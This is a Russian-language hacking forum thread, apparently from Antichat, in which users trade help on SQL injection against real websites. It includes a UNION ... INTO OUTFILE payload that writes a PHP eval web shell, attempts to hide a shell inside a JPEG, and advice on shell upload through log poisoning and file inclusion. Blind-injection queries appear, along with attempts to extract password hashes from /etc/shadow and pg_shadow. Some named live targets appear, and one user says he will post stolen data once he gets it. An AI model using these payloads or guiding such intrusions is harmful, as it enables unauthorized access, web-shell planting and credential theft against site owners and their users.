но т.к. стоит ORDER BY то union после него уже не работает..... обойти можно токо заключив все селекты в скобки... и использовав UNION ALL. но сдесь это зделать нельзя.. так что ищи еще скули перед ордером.)
Не обязательно я не спорю, но я дал пример с использованием функции ascii(), и запрос тем самым не испортил, просто сравниваю код символа, а не символ. ps думаю ты меня понял...
Нужно обратить внимание на саму ошибку Query: SELECT * FROM d2ladder WHERE game = 'D2XP' and type='SC' ORDER BY 10/* DESC LIMIT 0,50 Error: Unknown column '10' in 'order clause' в переменную sortBy мы передаем значение которое подставляется в конструкцию ORDER BY. Из этого можно сделать вывод, что в таблице d2ladder 9 колонок. А вообще иньекция интересная, есть над чем подумать...
Народ,а при залитии шелла через скулю можно как-то обойти ругательство на кавычки ? =______________=. Вот: http://site.com/news.php?id=-17+union+select+1,'<?php%20eval($_GET[‘e’]);?>',3+into+outfile+'/usr/local/www/data/partners.php'-- Выдаёт: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php on line 35 Ужс какой-то...
День добрый. Подскажите пожалуйста, как корректно оформить запрос к этому ресурсу: http://www.clubiki.ru/index.php?page=item&id=24696)+union+select+(1 Заранее спсибо.
Народ чтото странно. Хочу залить шел на форум через админку там только jpeg swf и все подобные Мне тут сказали что в любую картинку можно вставить шел, но у меня не получается ( Вот как я это делал картинка 1.jpeg открываю в notepad++ там иероглифы в самом конце через строчку вожу точно рабочий код шела (когда в .php он работает) вот так <? код шела ?> сохраняю в виде kartinka_shell_1.jpeg И когда заливаю всё нормально, делаю на главное страницы сылку на этот рисунок, жму на неё и пустой экран ( Что я неправильно делаю? мб кто выложит точно рабочий шел? в jpeg
Омфг. Хоть в подпись себе вставляй. ПХП код исполнится только при инклуде. Или же если на сервере настроено исполнение пхп кода в имэйджах (не видел никогда такого). Без инклуда, толку от твоей картинки 0.
1. etc/htpasswd/secure Кто-нить знает что лежит тут?)) 2. Может такое быть,что пароли от фтп хранятся ТОЛЬКО в etc/shadow. 3. Если лог-фаил существует, но непоказывает содержимое.Означает ли это отсутствие файла,или же нехватку прав на их просмотр ? 4.Слышал,что через ЛЮБЫЕ лог файлы можно залить шелл,если они просматриваются...тобишь доступны.Так ли это ? (slip.log,debug.log,auth.log,ppp.log и другие).Собственно - лог файлы access и log отличаются только видом доступа. Да,и ещё: Какие условия необходимы для глобального инклуда в скрипте ?(Извините за нуббизм,но всё же),помимо allow_url_fopen ? ЗЫ: К примеру,логи админки подойдут ? /home/host/htdocs/admin/log/error.log
Велемир, 2. С чего ты взял что они вообще там храняца? Почитай -http://ru.wikipedia.org/wiki/Passwd 3. Если лог-фаил существует...Означает ли это отсутствие файла. Ты сам-то понял чего хотел сказать?)) 4. Обязателен не только тот фактор, что они должны быть читабельны, но и что бы файл мог быть исполнен (т.е. должен быть инклюд. Это я к тому, что load_file() через скулю не прокатит) - это раз. А два - ты должен иметь возможность оставить в логе определенный след (т.е. шелл), чтобы потом его выполнить через инклюд. 5. Иметь пустой инклюд, т.е. без предварительно вписанного какого-нибудь пути. Или ты что-то другое имел в виду? з.ы. по просьбам особо внимательных - http://ru.wikipedia.org/wiki/Passwd#.D0.A4.D0.B0.D0.B9.D0.BB_.2Fetc.2Fshadow
у меня такая проблема: [http://site.ru]/index.php?act=25+AND+ascii(lower(substring(user(),1,1)))=97-- запрос проходит удачно, вытянул юзера, весию: 5.1.2.2 далее была идея подобрать таблицы и колонки так же способом: index.php?act=25+and+ascii(lower(substring(table_name,1,1)))>10+from+information_schema.tables+limit+0,1-- результата ноль. может ли кто подсказать метод раскрутки подобных скулей, хотябы теоретически. сайт пока не палю, когда получу от него то, что надо - выложу в соответствующей теме -) edited: непосредственно "кавычки" фильтруются, через char(39 / 34) не фильтрует, BENCHMARK не ощущается что проходит (скорее всего парсится).
И как всегда,благодарим за ответ))).А отсутствие файла я имел в виду отсутствие его содержимого - пустой короче говоря)).
Велемир, просто логгирование может быть отключено Или файл создала установка по дефолту, а потом настройки меняли и файл куда-то переехал, а остался пустой, не используемый лог-файл. Всякое может быть) Calcutta, ttp://forum.xaknet.ru/thread5614.html https://forum.antichat.ru/thread76312-blind.html TehRn, возможно, дыра на сайте жертвы закрыта Ты посмотри на дату - релиз 2005 года
попробуй автоматизировать, можно набросать скрипт-эксплоит на той же перловке. если я правильно понял, у тебя нет желания париться с ручным перебором, у меня была подобная проблемка, я ее решил на перле: https://forum.antichat.ru/showpost.php?p=743258&postcount=545 скрипт кривоват, но суть та же.
вопрос собственно такой..есть скуля.. постгрескл без поле вывода..то бишь слепая..спасибо многоуважаемому SQLHACK за его прогу сипт, с её помощью вывел таблицы и колонки..но вот беда когда бручу таблицу с юзерами имена виводит нормально а вот пассы только ******** какие есть идейки?
Идейка есть такая: Ты пытаешься вывести пароли из таблицы в которой их нет, а именно-pg_user Пароли хранятся в таблице pg_shadow , а на прочтение её у тебя 99.9% не хватит прав
2jokester тогда какие идеи?я не очень знаком с постгрескл..как ты говорил там присутствует pg_shadow , каким образом мне вытащить пассы или это нереально?
Gorev , А что нужно-то? Ты пытаешься вынуть пароли от базы, это врятли получится. В базе могут быть пароли от админок CMS , форума, и т.д. Чего ты хочешь добиться то?
